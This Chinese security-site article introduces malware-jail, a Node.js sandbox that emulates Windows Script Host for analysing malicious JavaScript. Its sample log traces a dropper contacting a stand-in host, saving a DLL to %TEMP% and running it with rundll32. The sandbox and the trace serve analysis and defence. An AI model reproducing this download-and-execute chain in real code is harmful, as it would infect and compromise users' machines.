malware-jail – 半自动化恶意Javascript脚本分析沙盒-malware-jail – 半自动化恶意Javascript脚本分析沙盒-华盟网

malware-jail – 半自动化恶意Javascript脚本分析沙盒

华盟学院山东省第二期线下学习计划

项目地址

https://github.com/HynekPetrak/malware-jail

项目简介

malware-jail是使用nodejs编写的一个沙盒,目前实现了wscript(Windows脚本宿主)和部分浏览器上的环境。不过至少有一部分恶意软件是通过wscript传播的,通过该沙盒我们可以分析恶意软件的行为并对其进行监控和查看。

使用方法

bash@linux# node jailme.js malware/example.js 11 Jan 00:06:24 - Malware sandbox ver. 0.2 11 Jan 00:06:24 - ------------------------ 11 Jan 00:06:24 - Sandbox environment sequence: env/eval.js,env/wscript.js 11 Jan 00:06:24 - Malware files: malware/example.js 11 Jan 00:06:24 - Output file for sandbox dump: sandbox_dump_after.json 11 Jan 00:06:24 - Output directory for generated files: output/ 11 Jan 00:06:24 - ==> Preparing Sandbox environment. 11 Jan 00:06:24 -  => Executing: env/eval.js 11 Jan 00:06:24 - Preparing sandbox to intercept eval() calls. 11 Jan 00:06:24 -  => Executing: env/wscript.js 11 Jan 00:06:24 - Preparing sandbox to emulate WScript environment. 11 Jan 00:06:24 - ==> Executing malware file(s). 11 Jan 00:06:24 -  => Executing: malware/example.js 11 Jan 00:06:24 - ActiveXObject(WScript.Shell) 11 Jan 00:06:24 - Created: WScript.Shell[1] 11 Jan 00:06:24 - WScript.Shell[1].ExpandEnvironmentStrings(%TEMP%) 11 Jan 00:06:24 - ActiveXObject(MSXML2.XMLHTTP) 11 Jan 00:06:24 - Created: MSXML2.XMLHTTP[2] 11 Jan 00:06:24 - MSXML2.XMLHTTP[2].open(POST,http://EXAMPLE.COM/redir.php,false) 11 Jan 00:06:24 - MSXML2.XMLHTTP[2].setRequestHeader(Content-Type, application
/x-www-form-urlencoded) 11 Jan 00:06:24 - MSXML2.XMLHTTP[2].send(iTlOlnxhMXnM=0.588860877091065&jndj=IT0601) 11 Jan 00:06:24 - MSXML2.XMLHTTP[2] Not sending data, if you want to interract with
 remote server, set --down=y 11 Jan 00:06:24 - MSXML2.XMLHTTP[2] Calling onreadystatechange() with dummy data
11 Jan 00:06:24 - ActiveXObject(ADODB.Stream) 11 Jan 00:06:24 - Created: ADODB_Stream[3] 11 Jan 00:06:24 - ADODB_Stream[3].Open() 11 Jan 00:06:24 - ADODB_Stream[3].Write(str) - 10001 bytes 11 Jan 00:06:24 - ADODB_Stream[3].SaveToFile(%TEMP%57020551.dll, 2) 11 Jan 00:06:24 - WScript.Shell[1].Exec(rundll32 %TEMP%57020551.dll, 
DllRegisterServer) 11 Jan 00:06:24 - ADODB_Stream[3].Close() 11 Jan 00:08:42 - ==> Script execution finished, dumping sandbox environment to a 
file. 11 Jan 00:08:42 - Saving: output/_TEMP__49629482.dll 11 Jan 00:08:42 - Saving: output/_TEMP__38611354.pdf 11 Jan 00:08:42 - Generated file saved 11 Jan 00:08:42 - Generated file saved 11 Jan 00:08:42 - The sandbox context has been  saved to: sandbox_dump_after

www.idc126.com

文章出处:黑客工具箱

本文由 华盟网 作者:congtou 发表,其版权均为 华盟网 所有,文章内容系作者个人观点,不代表 华盟网 对观点赞同或支持。如需转载,请注明文章来源。

0

发表评论